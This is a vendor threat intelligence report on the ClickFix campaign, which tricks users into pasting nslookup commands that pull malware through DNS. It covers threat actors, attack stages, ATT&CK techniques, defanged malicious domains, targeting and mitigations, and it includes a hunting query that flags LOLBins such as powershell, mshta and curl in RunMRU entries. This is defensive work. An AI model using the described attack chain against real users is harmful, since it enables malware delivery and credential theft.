Executive Summary

Microsoft has issued a critical advisory regarding a sophisticated social engineering campaign known as the ClickFix attack, which leverages DNS lookups as a covert channel to deliver and execute malware. This attack is notable for its abuse of legitimate Windows utilities, particularly nslookup, to bypass traditional security controls and deliver multi-stage payloads. The campaign is highly effective due to its reliance on user interaction, typically tricking victims into executing malicious commands under the guise of resolving technical issues or passing CAPTCHAs. The attack chain culminates in the deployment of advanced malware such as Lumma Stealer, ModeloRAT, and Atomic macOS Stealer (AMOS), with observed targeting across multiple sectors and geographies. This report provides a comprehensive technical analysis, threat actor profiling, exploitation details, victimology, and actionable mitigation strategies.

Threat Actor Profile

The ClickFix campaigns have been attributed to a constellation of financially motivated and advanced persistent threat (APT) groups, including Storm-1607, Storm-0426, Storm-0249, and GrayBravo (TAG-150). These actors are known for their agility in adopting novel social engineering techniques and leveraging commodity malware ecosystems. GrayBravo has been linked to the distribution of CastleLoader and Lumma Stealer, while Storm-1607 and Storm-0426 have orchestrated widespread phishing campaigns targeting North America and Europe. The threat actors demonstrate a high degree of operational security, frequently rotating infrastructure and payloads, and leveraging legitimate cloud and content delivery services to obfuscate their activities. Notably, Russian-speaking cybercriminal forums have been observed advertising ClickFix-style toolkits, indicating a commoditization of this attack vector.

Technical Analysis of Malware/TTPs

The ClickFix attack chain is characterized by its abuse of DNS as a command-and-control (C2) channel and its reliance on user-initiated execution. The initial vector is typically a phishing email, malvertising, or a compromised website that redirects the victim to a fake landing page, often masquerading as a Cloudflare or government portal. The user is instructed to copy and paste a command into the Windows Run dialog, Command Prompt, or PowerShell. This command invokes nslookup with a hardcoded external DNS server, bypassing local DNS filtering and logging.

The DNS response contains a second-stage payload, often encoded or obfuscated, which is then executed via a chained command. This payload may download a ZIP archive from attacker-controlled infrastructure (e.g., azwsappdev[.]com), containing a Python script that performs system reconnaissance and drops a VBScript. The VBScript is responsible for launching the primary malware, such as ModeloRAT or Lumma Stealer, and establishing persistence through a Windows LNK shortcut in the Startup folder.

The malware exhibits advanced evasion techniques, including the use of Living-off-the-Land Binaries (LOLBins) such as powershell.exe, mshta.exe, and rundll32.exe for fileless execution. Command obfuscation is achieved through Base64 encoding, string concatenation, and escape characters. The use of DNS as a covert channel allows the attackers to bypass network-based detection and exfiltrate data in a stealthy manner.

MITRE ATT&CK techniques observed include T1566.001 (Phishing: Spearphishing Attachment), T1566.002 (Phishing: Spearphishing Link), T1204.002 (User Execution: Malicious File), T1071.004 (Application Layer Protocol: DNS), T1059.001 (Command and Scripting Interpreter: PowerShell), T1059.003 (Command and Scripting Interpreter: Windows Command Shell), T1105 (Ingress Tool Transfer), T1547.001 (Boot or Logon Autostart Execution: Registry Run Keys/Startup Folder), T1218 (Signed Binary Proxy Execution), and T1027 (Obfuscated Files or Information).

Exploitation in the Wild

The ClickFix technique has been observed in active campaigns since late 2023, with a significant uptick in early 2024. Notable payloads include Lumma Stealer, ModeloRAT, Lampion, Xworm, AsyncRAT, NetSupport, SectopRAT, Latrodectus, MintsLoader, r77 rootkit, and Atomic macOS Stealer (AMOS). Loader malware such as CastleLoader and RenEngine Loader are frequently used as intermediaries.

Campaigns have leveraged fake government, tax, and social security sites (e.g., access-ssa-gov[.]es), malvertising on streaming and pirated content platforms, and Discord-themed lures. The attack has also been adapted for macOS, with AMOS delivered via similar social engineering tactics. Microsoft has tracked multiple campaigns orchestrated by Storm-1607, Storm-0426, and Storm-0249, with infrastructure and payloads rapidly evolving to evade detection.

Victimology and Targeting

Victims span a broad spectrum of sectors, including government, financial services, education, transportation, and general enterprise environments. End-user devices are particularly at risk due to the reliance on user interaction. Geographically, the campaigns have targeted the United States, Canada, Germany, Portugal, Switzerland, Luxembourg, France, Hungary, Mexico, India, Spain, Brazil, Romania, and Italy. The use of localized lures and language-specific phishing content indicates a high degree of targeting sophistication. Both individuals and organizations have been impacted, with a focus on credential theft, data exfiltration, and initial access for further monetization or ransomware deployment.

Mitigation and Countermeasures

To defend against ClickFix and similar DNS-abusing social engineering attacks, organizations should implement a multi-layered security strategy. Block all known indicators of compromise (IOCs) at the network perimeter and on endpoint security solutions. Monitor for suspicious RunMRU registry entries and anomalous usage of LOLBins such as powershell.exe, mshta.exe, and rundll32.exe. Disable unnecessary access to the Windows Run dialog (Win+R) via Group Policy, and restrict the execution of unsigned PowerShell scripts by enabling script block logging.

Leverage Microsoft Defender SmartScreen and network protection features to block access to known malicious domains and URLs. Educate users on the dangers of executing commands from untrusted sources, especially those presented in pop-ups or suspicious websites. Regularly update endpoint protection signatures and ensure that behavioral detection capabilities are enabled. Conduct proactive threat hunting using queries such as:

DeviceRegistryEvents | where ActionType =~ "RegistryValueSet" | where InitiatingProcessFileName =~ "explorer.exe" | where RegistryKey has @"\CurrentVersion\Explorer\RunMRU" | where RegistryValueData has_any ("powershell", "mshta", "curl", "msiexec", "^")

Consider implementing DNS filtering solutions that can detect and block anomalous DNS queries to external resolvers. Review and harden endpoint configurations to limit the abuse of built-in utilities for command execution and payload delivery.

References

Microsoft Security Blog: Think before you Click(Fix)

The Hacker News: Microsoft Discloses DNS-Based ClickFix Attack

Bitdefender: Lumma Stealer/CastleLoader Analysis

CloudSEK: AMOS via ClickFix

Securonix: OBSCURE#BAT Analysis

About Rescana

Rescana is a leader in third-party risk management (TPRM), providing organizations with a comprehensive platform to assess, monitor, and mitigate cyber risks across their supply chain and digital ecosystem. Our advanced threat intelligence and automation capabilities empower security teams to proactively identify and respond to emerging threats. For more information or to discuss how Rescana can enhance your cyber resilience, we are happy to answer questions at ops@rescana.com.